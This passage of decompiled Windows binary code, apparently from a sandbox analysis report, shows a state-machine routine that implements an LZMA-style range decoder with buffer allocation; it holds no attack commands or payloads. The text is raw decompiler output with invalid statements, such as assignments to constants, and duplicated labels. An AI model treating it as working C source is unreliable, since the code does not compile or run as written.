								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
